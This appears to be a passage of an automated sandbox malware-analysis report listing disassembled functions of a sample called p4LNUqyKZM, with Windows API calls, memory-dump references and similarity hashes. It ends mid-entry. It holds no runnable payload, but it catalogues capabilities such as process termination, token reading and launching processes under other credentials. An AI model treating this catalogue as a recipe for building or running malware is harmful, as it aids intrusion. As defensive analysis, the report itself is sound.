                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                        • String ID:
                        • API String ID: 3368777196-0
                        • Opcode ID: 49872d0d11098e731574ec312aa617e9117e9b7da855c6e68305d316ed1a8ce6
                        • Instruction ID: 91bd66663744f41efdf8114728468a3260a4edf7e685d669e51da044c1f709de
                        • Opcode Fuzzy Hash: 49872d0d11098e731574ec312aa617e9117e9b7da855c6e68305d316ed1a8ce6
                        • Instruction Fuzzy Hash: 9B417E75900209EBDF14EF94DC85AAAB778FF84310F1480A5ED04DA297D731DE65DBA0
                        Function 00A181DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                        Download Yara Rule
                        APIs
                        • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,009DF3AB,00000000,?,?,00000000,?,009D682C,00000004,00000000,00000000), ref: 00A1824C
                        • EnableWindow.USER32(00000000,00000000), ref: 00A18272
                        • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00A182D1
                        • ShowWindow.USER32(00000000,00000004), ref: 00A182E5
                        • EnableWindow.USER32(00000000,00000001), ref: 00A1830B
                        • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00A1832F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Window$Show$Enable$MessageSend
                        • String ID:
                        • API String ID: 642888154-0
                        • Opcode ID: ea339cb9d5eba2b5ff12668dd538dae7694a4cac9b36a17fac6075cccecc8d6b
                        • Instruction ID: d3d0fc99407b814db5f520a4259970dca515a52db2f61ee2454d100b8ceee6a6
                        • Opcode Fuzzy Hash: ea339cb9d5eba2b5ff12668dd538dae7694a4cac9b36a17fac6075cccecc8d6b
                        • Instruction Fuzzy Hash: A041E474601640EFDB22CF54D899BE47BE1FB0A715F1841A8F5684F2B2CB79AC82CB40
                        Function 009E4C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                        Download Yara Rule
                        APIs
                        • IsWindowVisible.USER32(?), ref: 009E4C95
                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 009E4CB2
                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 009E4CEA
                        • _wcslen.LIBCMT ref: 009E4D08
                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 009E4D10
                        • _wcsstr.LIBVCRUNTIME ref: 009E4D1A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                        • String ID:
                        • API String ID: 72514467-0
                        • Opcode ID: 513784e8fc8f22fc12fea4e8fcac6a5746257a4e99493e4b10807c894006e114
                        • Instruction ID: 8bddacc791c9fc6602e0e2155d973fd820728c588c14281c5f787621052be760
                        • Opcode Fuzzy Hash: 513784e8fc8f22fc12fea4e8fcac6a5746257a4e99493e4b10807c894006e114
                        • Instruction Fuzzy Hash: A7210B32204240BBEB169B7ADC49F7B7B9DDF85760F108039F805CB192DA65DC41D6A0
                        Function 009F581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00983AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00983A97,?,?,00982E7F,?,?,?,00000000), ref: 00983AC2
                        • _wcslen.LIBCMT ref: 009F587B
                        • CoInitialize.OLE32(00000000), ref: 009F5995
                        • CoCreateInstance.OLE32(00A1FCF8,00000000,00000001,00A1FB68,?), ref: 009F59AE
                        • CoUninitialize.OLE32 ref: 009F59CC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                        • String ID: .lnk
                        • API String ID: 3172280962-24824748
                        • Opcode ID: b380d2dfa66a78926018c132cf36daad4ca1c6f547dfb75fc73e580d684f8df7
                        • Instruction ID: 315d41df2f9925f73e7793fba7b7149b9ebda278855efdabc61f8b8aca2f8672
                        • Opcode Fuzzy Hash: b380d2dfa66a78926018c132cf36daad4ca1c6f547dfb75fc73e580d684f8df7
                        • Instruction Fuzzy Hash: 07D173746087059FC714EF24C480A2ABBE5FF89724F15885DFA8A9B361DB31EC45CB92
                        Function 009E175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009E0FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 009E0FCA
                          • Part of subcall function 009E0FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 009E0FD6
                          • Part of subcall function 009E0FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 009E0FE5
                          • Part of subcall function 009E0FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 009E0FEC
                          • Part of subcall function 009E0FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 009E1002
                        • GetLengthSid.ADVAPI32(?,00000000,009E1335), ref: 009E17AE
                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 009E17BA
                        • HeapAlloc.KERNEL32(00000000), ref: 009E17C1
                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 009E17DA
                        • GetProcessHeap.KERNEL32(00000000,00000000,009E1335), ref: 009E17EE
                        • HeapFree.KERNEL32(00000000), ref: 009E17F5
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                        • String ID:
                        • API String ID: 3008561057-0
                        • Opcode ID: 7f9aeb8540410c15b8a7c15b034fb5f5531b18f1f7b73f0d706450d93e8ce9ff
                        • Instruction ID: 80d82af0dcaaadfce70bf18b9c1b5fae51903ff6a236d2d0fe2632689ae44bda
                        • Opcode Fuzzy Hash: 7f9aeb8540410c15b8a7c15b034fb5f5531b18f1f7b73f0d706450d93e8ce9ff
                        • Instruction Fuzzy Hash: E811A932680205FFDB11DFA5CC49BAE7BB9EB45765F108518F881A7210C736AD41CB60
                        Function 009E14CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 009E14FF
                        • OpenProcessToken.ADVAPI32(00000000), ref: 009E1506
                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 009E1515
                        • CloseHandle.KERNEL32(00000004), ref: 009E1520
                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 009E154F
                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 009E1563
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                        • String ID:
                        • API String ID: 1413079979-0
                        • Opcode ID: a6d93b50bce6b301ea5cdf4311d76a8f813e3b0f6e33a6f2b8a6d7f776d4f54e
                        • Instruction ID: eb0869a5abb2df8e6db171849d2700f9edf70d7590963d7fd2baaea6826015d8
                        • Opcode Fuzzy Hash: a6d93b50bce6b301ea5cdf4311d76a8f813e3b0f6e33a6f2b8a6d7f776d4f54e
                        • Instruction Fuzzy Hash: 20115672600249ABDF12CFE8DD49BDE7BADEF48714F048024FA05A61A0D375CE61DB60
                        Function 009A3382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetLastError.KERNEL32(?,?,009A3379,009A2FE5), ref: 009A3390
                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 009A339E
                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 009A33B7
                        • SetLastError.KERNEL32(00000000,?,009A3379,009A2FE5), ref: 009A3409
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ErrorLastValue___vcrt_
                        • String ID:
                        • API String ID: 3852720340-0
                        • Opcode ID: b5cee7e99c6ff4d56f25662e106d252d6a0f92785259344a8c2ff3bf4cd24f01
                        • Instruction ID: 7b2da55b6b931b0eb283013fee50de442cb0a4d9b20026373c8e38ecaee1211b
                        • Opcode Fuzzy Hash: b5cee7e99c6ff4d56f25662e106d252d6a0f92785259344a8c2ff3bf4cd24f01
                        • Instruction Fuzzy Hash: 7801473B60E711BEEA6427F47C866672A98EBC7379320C229F424841F0FF124D0251C4
                        Function 009B2D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetLastError.KERNEL32(?,?,009B5686,009C3CD6,?,00000000,?,009B5B6A,?,?,?,?,?,009AE6D1,?,00A48A48), ref: 009B2D78
                        • _free.LIBCMT ref: 009B2DAB
                        • _free.LIBCMT ref: 009B2DD3
                        • SetLastError.KERNEL32(00000000,?,?,?,?,009AE6D1,?,00A48A48,00000010,00984F4A,?,?,00000000,009C3CD6), ref: 009B2DE0
                        • SetLastError.KERNEL32(00000000,?,?,?,?,009AE6D1,?,00A48A48,00000010,00984F4A,?,?,00000000,009C3CD6), ref: 009B2DEC
                        • _abort.LIBCMT ref: 009B2DF2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ErrorLast$_free$_abort
                        • String ID:
                        • API String ID: 3160817290-0
                        • Opcode ID: 5bf8c82b4063843cf2084ec2a5944083f3209c28d30ea6f554671c51cde8121e
                        • Instruction ID: 09a4c3b3ac414140596bae410b8dea89ffea559cb35377e5ef90ae152a5d5425
                        • Opcode Fuzzy Hash: 5bf8c82b4063843cf2084ec2a5944083f3209c28d30ea6f554671c51cde8121e
                        • Instruction Fuzzy Hash: 48F0C83654561037C612B778BF0AFDA265DFFC67B1F258918F838961D6EE2488025160
                        Function 00A18A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00999639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00999693
                          • Part of subcall function 00999639: SelectObject.GDI32(?,00000000), ref: 009996A2
                          • Part of subcall function 00999639: BeginPath.GDI32(?), ref: 009996B9
                          • Part of subcall function 00999639: SelectObject.GDI32(?,00000000), ref: 009996E2
                        • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00A18A4E
                        • LineTo.GDI32(?,00000003,00000000), ref: 00A18A62
                        • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00A18A70
                        • LineTo.GDI32(?,00000000,00000003), ref: 00A18A80
                        • EndPath.GDI32(?), ref: 00A18A90
                        • StrokePath.GDI32(?), ref: 00A18AA0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                        • String ID:
                        • API String ID: 43455801-0
                        • Opcode ID: 31bb3d34c06db57f0d131c134b2ab34f52f7473d31c5ac524131bf7dd630dd49
                        • Instruction ID: d8bc53f8bf733eb55d79d58527e808d3ad25b64b97dbde0fa7c1f9f85dac8baa
                        • Opcode Fuzzy Hash: 31bb3d34c06db57f0d131c134b2ab34f52f7473d31c5ac524131bf7dd630dd49
                        • Instruction Fuzzy Hash: 5D11B776040109FFDB129F94EC88EEA7F6DEB083A4F04C052FA199A1A1C7719D56DBA0
                        Function 009E51FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                        Download Yara Rule
                        APIs
                        • GetDC.USER32(00000000), ref: 009E5218
                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 009E5229
                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009E5230
                        • ReleaseDC.USER32(00000000,00000000), ref: 009E5238
                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 009E524F
                        • MulDiv.KERNEL32(000009EC,00000001,?), ref: 009E5261
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CapsDevice$Release
                        • String ID:
                        • API String ID: 1035833867-0
                        • Opcode ID: e0d9158b1ec5c1e08b0cb468ac51d06f1223e39691a01670f501741139678051
                        • Instruction ID: 21924f67b244b368b090e3d01486e4a279adc0a6f300794d23a5a90d0db233a9
                        • Opcode Fuzzy Hash: e0d9158b1ec5c1e08b0cb468ac51d06f1223e39691a01670f501741139678051
                        • Instruction Fuzzy Hash: F2014475A40754BBEB109BE69C49B9EBF78EB48761F048065FA05A7381D6709D01CB60
                        Function 00981BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                        Download Yara Rule
                        APIs
                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00981BF4
                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00981BFC
                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00981C07
                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00981C12
                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00981C1A
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00981C22
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Virtual
                        • String ID:
                        • API String ID: 4278518827-0
                        • Opcode ID: b8949b950cd8dfd29f14e3a0f629a34ab935eab54f674daf03fae32ff73fa861
                        • Instruction ID: 23cc2df4ebed77ac28f1ed4a923a76d006a807a9f7d32275869e0fefc23000d1
                        • Opcode Fuzzy Hash: b8949b950cd8dfd29f14e3a0f629a34ab935eab54f674daf03fae32ff73fa861
                        • Instruction Fuzzy Hash: F60167B0942B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5
                        Function 009EEB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                        Download Yara Rule
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 009EEB30
                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 009EEB46
                        • GetWindowThreadProcessId.USER32(?,?), ref: 009EEB55
                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009EEB64
                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009EEB6E
                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009EEB75
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                        • String ID:
                        • API String ID: 839392675-0
                        • Opcode ID: d01ef836aaea3b1bdaa5e67475f2430a9d80ea398e3fc6c9c4fb535fdf136dc4
                        • Instruction ID: 6640f220f57d0be27e8f568e91236d92b5297deeb0cef6694a1c82884508e171
                        • Opcode Fuzzy Hash: d01ef836aaea3b1bdaa5e67475f2430a9d80ea398e3fc6c9c4fb535fdf136dc4
                        • Instruction Fuzzy Hash: 6AF03072580168BBE72197929C0DEEF7A7CEFCAB21F008158F611D1091D7A45A02C6B5
                        Function 009D7439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetClientRect.USER32(?), ref: 009D7452
                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 009D7469
                        • GetWindowDC.USER32(?), ref: 009D7475
                        • GetPixel.GDI32(00000000,?,?), ref: 009D7484
                        • ReleaseDC.USER32(?,00000000), ref: 009D7496
                        • GetSysColor.USER32(00000005), ref: 009D74B0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ClientColorMessagePixelRectReleaseSendWindow
                        • String ID:
                        • API String ID: 272304278-0
                        • Opcode ID: 888de3397135960ee93373be4eaa17c6728c3a5c4f685f20a9924b1823b0b74d
                        • Instruction ID: c1f60584c6e95b32ce7ce245c6dfee37cc4eaf61d3a49327cb0ce7440273048f
                        • Opcode Fuzzy Hash: 888de3397135960ee93373be4eaa17c6728c3a5c4f685f20a9924b1823b0b74d
                        • Instruction Fuzzy Hash: E2018631480215EFEB519FE4DC08BEABBB6FB04321F608164F926A21B0DB311E42EB10
                        Function 009E1874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                        Download Yara Rule
                        APIs
                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 009E187F
                        • UnloadUserProfile.USERENV(?,?), ref: 009E188B
                        • CloseHandle.KERNEL32(?), ref: 009E1894
                        • CloseHandle.KERNEL32(?), ref: 009E189C
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 009E18A5
                        • HeapFree.KERNEL32(00000000), ref: 009E18AC
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                        • String ID:
                        • API String ID: 146765662-0
                        • Opcode ID: 1010cd47f26430decf6f349a55c75e4fd6822acca11fc3872f9c0849eae6a532
                        • Instruction ID: 7d4ec8b9a63bff75ecf371b985e42ab7378006f728694f66834d1ba8b3ec4b28
                        • Opcode Fuzzy Hash: 1010cd47f26430decf6f349a55c75e4fd6822acca11fc3872f9c0849eae6a532
                        • Instruction Fuzzy Hash: A7E0C236484211BBDA019BE1ED0C98ABB2AFB49B32B10C220F225850B0CB729422DB50
                        Function 009EC5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00987620: _wcslen.LIBCMT ref: 00987625
                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 009EC6EE
                        • _wcslen.LIBCMT ref: 009EC735
                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 009EC79C
                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 009EC7CA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ItemMenu$Info_wcslen$Default
                        • String ID: 0
                        • API String ID: 1227352736-4108050209
                        • Opcode ID: d9bc8c01051be17ead18aec101607e439726a381b43a16bfdf0eb0681f650520
                        • Instruction ID: 50962fb087d67a4925969b633f5a19eda0cf4d512f61b05388bd9c740e829a7e
                        • Opcode Fuzzy Hash: d9bc8c01051be17ead18aec101607e439726a381b43a16bfdf0eb0681f650520
                        • Instruction Fuzzy Hash: A151D1B16043819BD712DF2AC885B6BB7E8AF8A710F040A2DF9D5D3290DB75DC46CB52
                        Function 00A0AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                        Download Yara Rule
                        APIs
